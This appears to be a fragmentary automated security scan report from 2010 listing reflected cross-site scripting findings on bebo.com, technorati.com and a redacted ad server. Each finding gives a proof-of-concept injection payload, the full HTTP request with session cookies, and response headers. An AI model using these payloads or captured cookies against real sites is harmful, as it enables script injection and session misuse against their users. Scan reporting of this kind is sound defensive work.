Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: pl-PL
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:38 GMT
Content-Length: 9184
Connection: close
Cache-Control: max-age=600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb41d"><img%20src%3da%20onerror%3dalert(1)>86ea3df0102 was submitted in the REST URL parameter 2. This input was echoed as fb41d"><img src=a onerror=alert(1)>86ea3df0102 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/sitefb41d"><img%20src%3da%20onerror%3dalert(1)>86ea3df0102/regframe_script.js HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: fr-FR
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:38 GMT
Content-Length: 9267
Connection: close
Cache-Control: max-age=600
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6a438<img%20src%3da%20onerror%3dalert(1)>92cf382f499 was submitted in the REST URL parameter 3. This input was echoed as 6a438<img src=a onerror=alert(1)>92cf382f499 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/site/regframe_script.js6a438<img%20src%3da%20onerror%3dalert(1)>92cf382f499 HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:45 GMT
Content-Length: 8883
Connection: close
Cache-Control: no-cache
Pragma: No-cache
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a19'%3b63e7572dbb was submitted in the REST URL parameter 3. This input was echoed as 73a19';63e7572dbb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/site/regframe_script.js73a19'%3b63e7572dbb HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:42 GMT
Content-Length: 8631
Connection: close
Cache-Control: no-cache
Pragma: No-cache
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8b456'><script>alert(1)</script>0ee57a63d45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/site/regframe_script.js8b456'><script>alert(1)</script>0ee57a63d45 HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:42 GMT
Content-Length: 8808
Connection: close
Cache-Control: no-cache
Pragma: No-cache
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80bfb"><img%20src%3da%20onerror%3dalert(1)>8510a9b412b was submitted in the REST URL parameter 3. This input was echoed as 80bfb"><img src=a onerror=alert(1)>8510a9b412b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/site/80bfb"><img%20src%3da%20onerror%3dalert(1)>8510a9b412b HTTP/1.1
Host: s.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: de-DE
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 22:43:41 GMT
Content-Length: 8645
Connection: close
Cache-Control: no-cache
Pragma: No-cache
The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebb9f'-alert(1)-'57d6b041cfe was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cosmos/search.html?url=ebb9f'-alert(1)-'57d6b041cfe HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a47ae"><script>alert(1)</script>f3372539a5d was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cosmos/search.html?url=a47ae"><script>alert(1)</script>f3372539a5d HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a20c'%3b0344f0fcd83 was submitted in the REST URL parameter 4. This input was echoed as 5a20c';0344f0fcd83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /MRT/iview/266655638/direct5a20c'%3b0344f0fcd83 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1289161490-4161261; ach01=b1097a6/33f2/fc007b4/ce69/4cd70b5c:b3c8356/27054/fdc06b8/ba67/4cd71a92:b353b83/36d8/fe964b5/e2ff/4cd71b9e:ab41d2a/25f/b72466f/6d82/4cd71bff:10ecbc5/46c7/1fd2ded/e141/4cd86425:b16aca7/33f2/fc007b8/ce69/4cd8b6aa:a7af0e8/f9f/f3fefef/10401/4ce09e41; ach00=ba67/27054:e2ff/36d8:6d82/25f:e141/46c7:ce69/33f2:10401/f9f; MUID=96C2DF45871646C7B73393B23DF23548;
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7175
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 15 Nov 2010 22:44:01 GMT
Connection: close
1.81. http://redcated/MRT/iview/266655638/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /MRT/iview/266655638/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64e46"-alert(1)-"1be0f6ce88d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.82. http://redcated/MRT/iview/266655638/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /MRT/iview/266655638/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da40c"><script>alert(1)</script>7fa15ed131f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.83. http://redcated/MRT/iview/266655638/direct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /MRT/iview/266655638/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0c80'-alert(1)-'df91e654a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.300;hi.250/01/1331029817?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b342'-alert(1)-'707b1f3c09a was submitted in the wi.300;hi.250/01/1331029817?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.300;hi.250/01/1331029817?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0d7</script><script>alert(1)</script>55da2c470ce was submitted in the wi.300;hi.250/01/1331029817?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.300;hi.250/01/219593849?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 896e7</script><script>alert(1)</script>6f1d8fde8cb was submitted in the wi.300;hi.250/01/219593849?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the wi.300;hi.250/01/219593849?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b5dd'-alert(1)-'30c7ebaa98f was submitted in the wi.300;hi.250/01/219593849?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48067'%3be278ea33c24 was submitted in the REST URL parameter 4. This input was echoed as 48067';e278ea33c24 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bf1a</script><script>alert(1)</script>a1c71707b09 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c03cf'-alert(1)-'354310767fc was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.91. http://redcated/UMD/iview/264660720/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /UMD/iview/264660720/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd284'-alert(1)-'18ecdee4e7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.92. http://redcated/UMD/iview/264660720/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /UMD/iview/264660720/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19c71"-alert(1)-"863de83c9c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.93. http://redcated/UMD/iview/264660720/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /UMD/iview/264660720/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e397c"><script>alert(1)</script>f9d62b2654f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20524'%3b1ef9abcc4d3 was submitted in the REST URL parameter 4. This input was echoed as 20524';1ef9abcc4d3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b085e</script><script>alert(1)</script>f6b92676d58 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5cb5'-alert(1)-'0cbd3bd2b96 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.97. http://redcated/UMD/iview/264660724/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /UMD/iview/264660724/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2375'-alert(1)-'99d48ad5cf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.98. http://redcated/UMD/iview/264660724/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /UMD/iview/264660724/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a485b"-alert(1)-"8532b7710f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.99. http://redcated/UMD/iview/264660724/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /UMD/iview/264660724/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcddd"><script>alert(1)</script>71ac5f58114 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e1e7'><script>alert(1)</script>55132f9b52f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Bands.jsp4e1e7'><script>alert(1)</script>55132f9b52f HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: pl-PL
Content-Type: text/html; charset=UTF-8
Content-Length: 8787
Date: Mon, 15 Nov 2010 22:43:30 GMT
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec5d6'%3b6cf230d9add was submitted in the REST URL parameter 1. This input was echoed as ec5d6';6cf230d9add in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Bands.jspec5d6'%3b6cf230d9add HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: de-DE
Content-Type: text/html; charset=UTF-8
Content-Length: 8520
Date: Mon, 15 Nov 2010 22:43:31 GMT
Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 300ff<img%20src%3da%20onerror%3dalert(1)>20431083eda was submitted in the REST URL parameter 1. This input was echoed as 300ff<img src=a onerror=alert(1)>20431083eda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Bands.jsp300ff<img%20src%3da%20onerror%3dalert(1)>20431083eda HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: de-DE
Content-Type: text/html; charset=UTF-8
Content-Length: 8754
Date: Mon, 15 Nov 2010 22:43:33 GMT
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b4c9"><img%20src%3da%20onerror%3dalert(1)>e2d022ceed2 was submitted in the REST URL parameter 1. This input was echoed as 2b4c9"><img src=a onerror=alert(1)>e2d022ceed2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Bands.jsp2b4c9"><img%20src%3da%20onerror%3dalert(1)>e2d022ceed2 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: nl-NL
Content-Type: text/html; charset=UTF-8
Content-Length: 8805
Date: Mon, 15 Nov 2010 22:43:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cae26'><script>alert(1)</script>e457cd0632b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /InviteJoin.jspcae26'><script>alert(1)</script>e457cd0632b HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: nl-NL
Content-Type: text/html; charset=UTF-8
Content-Length: 8759
Date: Mon, 15 Nov 2010 22:43:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d45"><img%20src%3da%20onerror%3dalert(1)>6eb76697f7a was submitted in the REST URL parameter 1. This input was echoed as 38d45"><img src=a onerror=alert(1)>6eb76697f7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /InviteJoin.jsp38d45"><img%20src%3da%20onerror%3dalert(1)>6eb76697f7a HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
